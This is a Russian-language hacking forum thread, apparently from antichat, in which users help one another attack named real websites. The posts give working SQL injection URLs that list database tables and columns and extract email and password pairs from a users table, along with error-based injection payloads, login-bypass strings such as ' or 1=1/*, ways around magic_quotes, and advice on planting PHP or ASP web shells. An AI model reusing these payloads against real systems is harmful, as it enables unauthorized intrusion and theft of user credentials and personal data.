да, file_priv:Y. /etc/passwd отлично читает. пытался найти через ошибки. пропуская все через hex. не открывает. ошибок не выводит. пытаюсь залить шелл через mysql. magic_quotes=on. почитал на ачате как обойти. не получается.
почитал статью https://forum.antichat.ru/showpost.php?p=663815&postcount=39 мой запрос все выводит. пытаюсь сделать через второй запрос, чтобы обойти magic_quotes. заместо единицы вставляю hex кусок. основной запрос проходит, второй с ошибками. вроде все правильно делаю. подскажите в чем моя ошибка. спасибо
-- -коментарий который отбрасывает конец запроса. /* */ - это окмментарий который отбрасывает середину
Ну тогда не зальешь. Да даже если бы и были права, и получилось бы залить php-шелл, то ты был бы в той же ситуации, что и сейчас - править, заливать не сможешь ничего. PHP под IIS(а там он судя по описанию) обычно сильно урезан в правах. Попробуй ливануть asp-шелл или coldfusion (если там стоит)
Есть админка: http://www.rbeurope.org/admin Там два поля. При подстановке в логин ' or 1=1/* . Походу фильтруется /*. Что можно еще сделать?
Если действительно фильтруеться слеш и нужно отбросить запрос, попробуй "--" или "--+" или ")--+", если там канечно в этом дело, посмотреть не могу.
Code: _http://www.rbeurope.org/afiseaza.php?id=20+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,version%28%29,25,26,27--+ Таблицы: HTML: articole:butic_livrari:butic_optiuni:butic_zone:cat_activite:citizenships:county:docs:emails:events:eventsdetails:eventspictures:hotel_prices:imagini:institute:letters:limbi:livration:mesaje:mesaje_admin:mesaje_old:monede:newsletter:persons:pictures:plati:plati_backup:produse:registration_fees:rezervari_hotel:scroll:seminar:sess:specific:tari:users:users_backup Code: _http://www.rbeurope.org/afiseaza.php?id=20+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,GROUP_CONCAT%28COLUMN_NAME%20SEPARATOR%200x3a%29%20,25,26,27+FROM%20information_schema.COLUMNS%20WHERE%20TABLE_NAME=0x7573657273--+ Колонки users: HTML: id:title:lastname:firstname:email:password:position:organization:postal_address:compl_address:zip_code:town:id_tari:id_citizenships:phone:fax:nametag_name:nametag_affiliation:reg_fees:dinner1:dinner2:flag:platit:valoare Code: _http://www.rbeurope.org/afiseaza.php?id=20+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,concat_ws%280x3a,email,password%29%20,25,26,27+FROM+users+limit+303,1--+ Кстати, не набирайте никто http://www.rbeurope.org/login.php
А с чего ты взял, что там возможно так авторизоваться? о_0 Тем более там Basic-auth, она с БД не связана никак.
интересно что ты мне этим хотел сказать? вроде здесь вопросы задают и отвечают на них если реально знают что и как..а ты что мне посоветовал ? или хочешь мне указать какой я глупый что не увидел сейф мод?.... я шеллов перевидал не мало...и если спрашиваю что и как то значит ситуация неординарная.... и кстати сейф мод офф и папки и файлы все зеленые если ты понимаешь что я имею в виду, я вроде написал выше что смущает меня то что везде вроде права зеленые , но ни править ни заливать ничего нельзя.... надеюсь сейчас нормальным турецким языком отписал? и все меня поняли
в венде нет прав как в линуксе - 777, 755 и прочего. php видит файлы как 666, а директории как 777(хотя это условности, которые ничего не значат). А права доступа устанавливаются в IIS и в настройках серва.
Я устанавливал двиг какой то, непомню, на винде(стоит денвер!) и не мог попасть на сайт после установки. Изменил через функцию chmod в пхп файл, права которого было указано что надо изменить, то пустило.Как это понимать хз, так как на винде нет прав!? ps не надо говорить что я чето завтыкал!
http://www.4ips.biz/products.php?id=71+union+select+1,2,3,4%20-- через order by получается что 4 колонки но подставляя пишет что не верное кол-во, пробывал менять лимит - бесполезно и ещё: чем можно заменить знак кавычки кроме как через hex?
Code: http://www.4ips.biz/products.php?id=(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+pics_db+group+by+2+limit+1)a)
Pashkela а как ты узнал о существовании таблицы pics_db, брут? и как через такую ошибку, зная название таблицы можно узнать название столбцов? http://www.4ips.biz/products.php?id=(select+1+from+(select+count(0),co ncat((select+pic s_db.*),floor(rand(0)*2))+from+pic s_db+group+by+2+limit+1)a) ?
